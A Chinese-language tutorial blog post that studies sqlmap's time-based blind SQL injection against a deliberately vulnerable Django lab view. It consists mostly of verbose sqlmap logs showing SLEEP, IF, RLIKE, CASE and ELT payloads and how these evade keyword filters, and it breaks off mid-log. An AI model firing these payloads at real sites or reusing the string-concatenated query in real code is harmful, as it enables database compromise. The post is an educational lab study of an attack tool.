如何研究sqlmap使用的注入技术

这篇文章给大家介绍如何研究sqlmap使用的注入技术，内容非常详细，感兴趣的小伙伴们可以参考借鉴，希望对大家能有所帮助。

使用django搭建了一个注入靶机

def te(request):    id = request.GET.get("id")    db = pymysql.connect("127.0.0.1", "root", "123456", "t1", charset='utf8')    cursor = db.cursor()    cursor.execute("SELECT * FROM test where id =" + id)    data = cursor.fetchone()    db.close()    return HttpResponse(data[1])

正常页面

加上单引号

在SQLMAP注入检测技术有这几种

基于时间注入(T)

注入命令

--level 5 --risk 3 --batch --dbms=mysql -v 3 -p id --flush-session  --technique=T

[22:19:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'[22:19:32] [PAYLOAD] 1) AND SLEEP(5)-- RfYH[22:19:32] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)[22:19:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:33] [PAYLOAD] 1) AND SLEEP(5) AND (9830=9830[22:19:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:33] [PAYLOAD] 1)) AND SLEEP(5) AND ((9685=9685[22:19:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:33] [PAYLOAD] 1))) AND SLEEP(5) AND (((6020=6020[22:19:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:33] [PAYLOAD] 1 AND SLEEP(5)[22:19:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:38] [PAYLOAD] 1 AND SLEEP(0)[22:19:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:38] [PAYLOAD] 1 AND SLEEP(5)[22:19:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:43] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable[22:19:43] [PAYLOAD] 1 AND 6670=IF((61=61),SLEEP(5),6670)[22:19:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:48] [PAYLOAD] 1 AND 6666=IF((61=78),SLEEP(5),6666)[22:19:48] [PAYLOAD] 1 AND 4347=IF((61=99),SLEEP(5),4347)[22:19:48] [PAYLOAD] 1 AND 4376=IF((99=78),SLEEP(5),4376)[22:19:48] [PAYLOAD] 1 AND 3045=IF((78=78),SLEEP(5),3045)[22:19:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:53] [PAYLOAD] 1 AND 7064=IF((99 78),SLEEP(5),7064)[22:19:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:53] [PAYLOAD] 1 AND 4629=IF((16=16),SLEEP(5),4629)[22:19:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:58] [PAYLOAD] 1 AND 5264=IF((16=40),SLEEP(5),5264)[22:19:58] [PAYLOAD] 1 AND 6070=IF((16=93),SLEEP(5),6070)[22:19:58] [PAYLOAD] 1 AND 7543=IF((93=40),SLEEP(5),7543)[22:19:58] [PAYLOAD] 1 AND 3147=IF((40=40),SLEEP(5),3147)[22:20:03] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:04] [PAYLOAD] 1 AND 8849=IF((93 40),SLEEP(5),8849)[22:20:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:04] [PAYLOAD] 1 AND 8037=IF((11=11),SLEEP(5),8037)[22:20:09] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:09] [PAYLOAD] 1 AND 1374=IF((11=19),SLEEP(5),1374)[22:20:09] [PAYLOAD] 1 AND 7006=IF((11=55),SLEEP(5),7006)[22:20:09] [PAYLOAD] 1 AND 9634=IF((55=19),SLEEP(5),9634)[22:20:09] [PAYLOAD] 1 AND 9001=IF((19=19),SLEEP(5),9001)[22:20:14] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:14] [PAYLOAD] 1 AND 8633=IF((55 19),SLEEP(5),8633)[22:20:14] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:14] [PAYLOAD] 1 AND 3268=IF((39=39),SLEEP(5),3268)[22:20:19] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:19] [PAYLOAD] 1 AND 8941=IF((39=95),SLEEP(5),8941)[22:20:19] [PAYLOAD] 1 AND 8749=IF((39=99),SLEEP(5),8749)[22:20:19] [PAYLOAD] 1 AND 3479=IF((99=95),SLEEP(5),3479)[22:20:19] [PAYLOAD] 1 AND 7395=IF((95=95),SLEEP(5),7395)[22:20:24] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:24] [PAYLOAD] 1 AND 7236=IF((99 95),SLEEP(5),7236)[22:20:24] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:24] [PAYLOAD] 1 AND 2647=IF((16=16),SLEEP(5),2647)[22:20:29] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:29] [PAYLOAD] 1 AND 1648=IF((16=18),SLEEP(5),1648)[22:20:29] [PAYLOAD] 1 AND 9955=IF((16=72),SLEEP(5),9955)[22:20:29] [PAYLOAD] 1 AND 5891=IF((72=18),SLEEP(5),5891)[22:20:29] [PAYLOAD] 1 AND 2035=IF((18=18),SLEEP(5),2035)[22:20:34] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:34] [PAYLOAD] 1 AND 9912=IF((72 18),SLEEP(5),9912)[22:20:34] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:34] [DEBUG] checking for parameter length constrainting mechanisms[22:20:34] [PAYLOAD] 1 AND 7575=IF((4938=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4938),SLEEP(5),7575)[22:20:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:39] [DEBUG] checking for filtered characters[22:20:39] [PAYLOAD] 1 AND 3720=IF((5937>5936),SLEEP(5),3720)[22:20:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[22:20:44] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 67 HTTP(s) requests:---Parameter: id (GET)    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 AND time-based blind    Payload: id=1 AND SLEEP(5)    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])---[22:20:44] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.12

使用这个payload的时候，测试能不能使用if函数，如果if成功则会睡眠5秒，

否则返回6670，而6670又等于外面的6670，所以会返回1

假如我禁止使用字符串AND

sqlmap就会自己选择or

当使用or+slee(5)的时候，无法执行sleep

[22:35:43] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'[22:35:43] [PAYLOAD] 1) OR SLEEP(5)#[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:43] [PAYLOAD] 1)) OR SLEEP(5)#[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:43] [PAYLOAD] 1))) OR SLEEP(5)#[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:43] [PAYLOAD] 1 OR SLEEP(5)#[22:35:43] [PAYLOAD] 1) WHERE 1129=1129 OR SLEEP(5)#[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:43] [PAYLOAD] 1 WHERE 5039=5039 OR SLEEP(5)#[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:43] [PAYLOAD] 1)) AS aXdd WHERE 6537=6537 OR SLEEP(5)#[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:43] [PAYLOAD] 1) AS yosm WHERE 7331=7331 OR SLEEP(5)#[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:43] [PAYLOAD] 1` WHERE 3927=3927 OR SLEEP(5)#[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:43] [PAYLOAD] 1`) WHERE 9536=9536 OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1') OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1' OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1" OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1')) OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1'))) OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1") OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1")) OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1"))) OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1%') OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1%')) OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1%'))) OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1%' OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1%") OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1%")) OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1%"))) OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1%" OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1') WHERE 1477=1477 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1") WHERE 2319=2319 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1' WHERE 5508=5508 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1" WHERE 9299=9299 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1'||(SELECT 'gxbY' FROM DUAL WHERE 3409=3409 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1'||(SELECT 'XQiD' WHERE 6808=6808 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1'+(SELECT MsiW WHERE 5089=5089 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1'+(SELECT 'tHYQ' WHERE 6487=6487 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1')) AS EeuT WHERE 2138=2138 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1")) AS zUfI WHERE 4750=4750 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1') AS NSxT WHERE 1030=1030 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1") AS jGtE WHERE 8551=8551 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)

就会切换成这种模式

[22:35:56] [INFO] checking if the injection point on GET parameter 'id' is a false positive[22:35:56] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(37=37,0,5)))))Drzz)[22:36:01] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(37=62,0,5)))))uxWh)[22:36:01] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(37=75,0,5)))))gkcr)[22:36:01] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(75=62,0,5)))))HftH)[22:36:01] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(62=62,0,5)))))PEif)[22:36:06] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(75 62,0,5)))))rIqx)[22:36:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:36:06] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(41=41,0,5)))))AiYm)[22:36:11] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(41=48,0,5)))))ksnP)[22:36:11] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(41=60,0,5)))))hfID)[22:36:11] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(60=48,0,5)))))FdQf)[22:36:11] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(48=48,0,5)))))sOgu)[22:36:16] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(60 48,0,5)))))nQeP)[22:36:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:36:16] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(12=12,0,5)))))BobY)[22:36:21] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(12=39,0,5)))))Vnya)[22:36:22] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(12=90,0,5)))))dioX)[22:36:22] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(90=39,0,5)))))uINL)[22:36:22] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(39=39,0,5)))))UhqQ)[22:36:27] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(90 39,0,5)))))aHQG)[22:36:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:36:27] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(39=39,0,5)))))BVgV)[22:36:32] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(39=57,0,5)))))uDwn)[22:36:32] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(39=72,0,5)))))OtdM)[22:36:32] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(72=57,0,5)))))XExQ)[22:36:32] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(57=57,0,5)))))MeGs)[22:36:37] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(72 57,0,5)))))USnO)[22:36:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:36:37] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(38=38,0,5)))))kNFY)[22:36:42] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(38=39,0,5)))))LZUq)[22:36:42] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(38=62,0,5)))))CbGw)[22:36:42] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(62=39,0,5)))))fatr)[22:36:42] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(39=39,0,5)))))wnqf)[22:36:47] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(62 39,0,5)))))vOsj)[22:36:47] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:36:47] [DEBUG] checking for parameter length constrainting mechanisms[22:36:47] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(2557=

成功睡眠

它将结果作为一个子查询作为一个表，后面那个Drzz是作为别名返回。

1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(37=37,0,5)))))Drzz)

假如禁掉的是AND,IF字符串，就会失败

假如禁掉的是AND,OR字符串

在MySQL中，RLIKE运算符用于确定字符串是否匹配正则表达式。它是REGEXP_LIKE()的同义词。如果字符串与提供的正则表达式匹配，则结果为1，否则为0。

[22:59:15] [INFO] checking if the injection point on GET parameter 'id' is a false positive[22:59:15] [PAYLOAD] 1 RLIKE (SELECT 6936=IF((30=30),SLEEP(5),6936))[22:59:20] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:21] [PAYLOAD] 1 RLIKE (SELECT 1879=IF((30=59),SLEEP(5),1879))[22:59:21] [PAYLOAD] 1 RLIKE (SELECT 4259=IF((30=79),SLEEP(5),4259))[22:59:21] [PAYLOAD] 1 RLIKE (SELECT 1368=IF((79=59),SLEEP(5),1368))[22:59:22] [PAYLOAD] 1 RLIKE (SELECT 2671=IF((59=59),SLEEP(5),2671))[22:59:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:27] [PAYLOAD] 1 RLIKE (SELECT 6464=IF((79 59),SLEEP(5),6464))[22:59:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:27] [PAYLOAD] 1 RLIKE (SELECT 8940=IF((34=34),SLEEP(5),8940))[22:59:32] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:32] [PAYLOAD] 1 RLIKE (SELECT 4099=IF((34=69),SLEEP(5),4099))[22:59:32] [PAYLOAD] 1 RLIKE (SELECT 4609=IF((34=85),SLEEP(5),4609))[22:59:32] [PAYLOAD] 1 RLIKE (SELECT 5560=IF((85=69),SLEEP(5),5560))[22:59:32] [PAYLOAD] 1 RLIKE (SELECT 8957=IF((69=69),SLEEP(5),8957))[22:59:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:37] [PAYLOAD] 1 RLIKE (SELECT 2173=IF((85 69),SLEEP(5),2173))[22:59:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:37] [PAYLOAD] 1 RLIKE (SELECT 1282=IF((27=27),SLEEP(5),1282))[22:59:42] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:42] [PAYLOAD] 1 RLIKE (SELECT 7694=IF((27=77),SLEEP(5),7694))[22:59:42] [PAYLOAD] 1 RLIKE (SELECT 6583=IF((27=93),SLEEP(5),6583))[22:59:42] [PAYLOAD] 1 RLIKE (SELECT 9747=IF((93=77),SLEEP(5),9747))[22:59:42] [PAYLOAD] 1 RLIKE (SELECT 9719=IF((77=77),SLEEP(5),9719))[22:59:47] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:47] [PAYLOAD] 1 RLIKE (SELECT 6903=IF((93 77),SLEEP(5),6903))[22:59:47] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:47] [PAYLOAD] 1 RLIKE (SELECT 2802=IF((29=29),SLEEP(5),2802))[22:59:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:52] [PAYLOAD] 1 RLIKE (SELECT 8059=IF((29=44),SLEEP(5),8059))[22:59:52] [PAYLOAD] 1 RLIKE (SELECT 5050=IF((29=69),SLEEP(5),5050))[22:59:52] [PAYLOAD] 1 RLIKE (SELECT 6203=IF((69=44),SLEEP(5),6203))[22:59:52] [PAYLOAD] 1 RLIKE (SELECT 6233=IF((44=44),SLEEP(5),6233))[22:59:57] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:57] [PAYLOAD] 1 RLIKE (SELECT 2840=IF((69 44),SLEEP(5),2840))[22:59:57] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:57] [PAYLOAD] 1 RLIKE (SELECT 5151=IF((32=32),SLEEP(5),5151))[23:00:02] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:00:02] [PAYLOAD] 1 RLIKE (SELECT 9793=IF((32=71),SLEEP(5),9793))[23:00:02] [PAYLOAD] 1 RLIKE (SELECT 6044=IF((32=83),SLEEP(5),6044))[23:00:02] [PAYLOAD] 1 RLIKE (SELECT 6513=IF((83=71),SLEEP(5),6513))[23:00:02] [PAYLOAD] 1 RLIKE (SELECT 7971=IF((71=71),SLEEP(5),7971))[23:00:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:00:07] [PAYLOAD] 1 RLIKE (SELECT 3576=IF((83 71),SLEEP(5),3576))[23:00:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:00:08] [DEBUG] checking for parameter length constrainting mechanisms[23:00:08] [PAYLOAD] 1 RLIKE (SELECT 4796=IF((9305=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                9305),SLEEP(5),4796))[23:00:13] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:00:13] [DEBUG] checking for filtered characters[23:00:13] [PAYLOAD] 1 RLIKE (SELECT 7423=IF((2249>2248),SLEEP(5),7423))

假如禁掉的是AND,OR，RLIKE字符串

数据SQL CASE 表达式是一种通用的条件表达式，类似于其它语言中的 if/else 语句。 CASE WHEN condition THEN result 　　　WHEN condition THEN result 　　　.............　　　[WHEN ...] 　　　[ELSE result] END CASE 子句可以用于任何表达式可以有效存在的地方。 condition 是一个返回boolean 的表达式。 如果结果为真，那么 CASE 表达式的结果就是符合条件的 result。 如果结果为假，那么以相同方式搜寻任何随后的 WHEN 子句。 如果没有 WHEN condition 为真，那么 case 表达式的结果就是在 ELSE 子句里的值。 如果省略了 ELSE 子句而且没有匹配的条件， 结果为 NULL。或其语法为：简单Case函数 CASE sex          WHEN '1' THEN '男'          WHEN '2' THEN '女' ELSE '其他' END 建议都使用第一种，少

[23:03:11] [INFO] checking if the injection point on GET parameter 'id' is a false positive[23:03:11] [PAYLOAD] (CASE WHEN (13=13) THEN SLEEP(5) ELSE 9315 END)[23:03:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:16] [PAYLOAD] (CASE WHEN (13=29) THEN SLEEP(5) ELSE 2370 END)[23:03:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:16] [PAYLOAD] (CASE WHEN (13=56) THEN SLEEP(5) ELSE 9841 END)[23:03:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:16] [PAYLOAD] (CASE WHEN (56=29) THEN SLEEP(5) ELSE 8206 END)[23:03:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:16] [PAYLOAD] (CASE WHEN (29=29) THEN SLEEP(5) ELSE 7582 END)[23:03:22] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:22] [PAYLOAD] (CASE WHEN (56 29) THEN SLEEP(5) ELSE 7064 END)[23:03:22] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:22] [PAYLOAD] (CASE WHEN (52=52) THEN SLEEP(5) ELSE 1764 END)[23:03:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:27] [PAYLOAD] (CASE WHEN (52=88) THEN SLEEP(5) ELSE 3749 END)[23:03:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:27] [PAYLOAD] (CASE WHEN (52=95) THEN SLEEP(5) ELSE 7047 END)[23:03:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:27] [PAYLOAD] (CASE WHEN (95=88) THEN SLEEP(5) ELSE 9320 END)[23:03:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:27] [PAYLOAD] (CASE WHEN (88=88) THEN SLEEP(5) ELSE 7829 END)[23:03:32] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:32] [PAYLOAD] (CASE WHEN (95 88) THEN SLEEP(5) ELSE 1663 END)[23:03:32] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:32] [PAYLOAD] (CASE WHEN (51=51) THEN SLEEP(5) ELSE 8885 END)[23:03:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:37] [PAYLOAD] (CASE WHEN (51=75) THEN SLEEP(5) ELSE 2713 END)[23:03:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:37] [PAYLOAD] (CASE WHEN (51=89) THEN SLEEP(5) ELSE 2195 END)[23:03:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:37] [PAYLOAD] (CASE WHEN (89=75) THEN SLEEP(5) ELSE 6522 END)[23:03:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:37] [PAYLOAD] (CASE WHEN (75=75) THEN SLEEP(5) ELSE 4869 END)[23:03:42] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:42] [PAYLOAD] (CASE WHEN (89 75) THEN SLEEP(5) ELSE 7742 END)[23:03:42] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:42] [PAYLOAD] (CASE WHEN (52=52) THEN SLEEP(5) ELSE 7375 END)[23:03:47] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:48] [PAYLOAD] (CASE WHEN (52=60) THEN SLEEP(5) ELSE 7982 END)[23:03:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:48] [PAYLOAD] (CASE WHEN (52=85) THEN SLEEP(5) ELSE 9535 END)[23:03:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:48] [PAYLOAD] (CASE WHEN (85=60) THEN SLEEP(5) ELSE 1355 END)[23:03:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:48] [PAYLOAD] (CASE WHEN (60=60) THEN SLEEP(5) ELSE 6053 END)[23:03:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:53] [PAYLOAD] (CASE WHEN (85 60) THEN SLEEP(5) ELSE 1168 END)[23:03:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:53] [PAYLOAD] (CASE WHEN (61=61) THEN SLEEP(5) ELSE 1220 END)[23:03:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:58] [PAYLOAD] (CASE WHEN (61=63) THEN SLEEP(5) ELSE 1146 END)[23:03:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:58] [PAYLOAD] (CASE WHEN (61=90) THEN SLEEP(5) ELSE 8312 END)[23:03:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:58] [PAYLOAD] (CASE WHEN (90=63) THEN SLEEP(5) ELSE 7015 END)[23:03:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:58] [PAYLOAD] (CASE WHEN (63=63) THEN SLEEP(5) ELSE 5683 END)[23:04:03] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:04:03] [PAYLOAD] (CASE WHEN (90 63) THEN SLEEP(5) ELSE 1858 END)[23:04:03] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:04:03] [DEBUG] checking for parameter length constrainting mechanisms[23:04:03] [PAYLOAD] (CASE WHEN (5036=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5036) THEN SLEEP(5) ELSE 3974 END)[23:04:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:04:08] [DEBUG] checking for filtered characters[23:04:08] [PAYLOAD] (CASE WHEN (6800>6799) THEN SLEEP(5) ELSE 4861 END)[23:04:13] [DEBUG] got HTTP error code: 500 (Internal Server Error)GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[23:04:13] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 1052 HTTP(s) requests:---Parameter: id (GET)    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 time-based blind - Parameter replace    Payload: id=(CASE WHEN (6409=6409) THEN SLEEP(5) ELSE 6409 END)    Vector: (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)---[23:04:13] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.12

假如禁掉的是AND,OR，RLIKE,CASE字符串，就会直接使用select进行查询，不适用and，or

假如禁掉的是AND,OR，RLIKE,CASE，SELECT字符串

ELT(N,str1,str2,str3,...)如果N =1返回str1，如果N= 2返回str2，等等。返回NULL如果参数的数量小于1或大于N。ELT()是FIELD()的补集。

[23:08:59] [INFO] checking if the injection point on GET parameter 'id' is a false positive[23:08:59] [PAYLOAD] ELT(24=24,SLEEP(5))[23:09:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:04] [PAYLOAD] ELT(24=44,SLEEP(5))[23:09:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:04] [PAYLOAD] ELT(24=65,SLEEP(5))[23:09:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:05] [PAYLOAD] ELT(65=44,SLEEP(5))[23:09:05] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:05] [PAYLOAD] ELT(44=44,SLEEP(5))[23:09:10] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:10] [PAYLOAD] ELT(65 44,SLEEP(5))[23:09:10] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:10] [PAYLOAD] ELT(33=33,SLEEP(5))[23:09:15] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:15] [PAYLOAD] ELT(33=59,SLEEP(5))[23:09:15] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:15] [PAYLOAD] 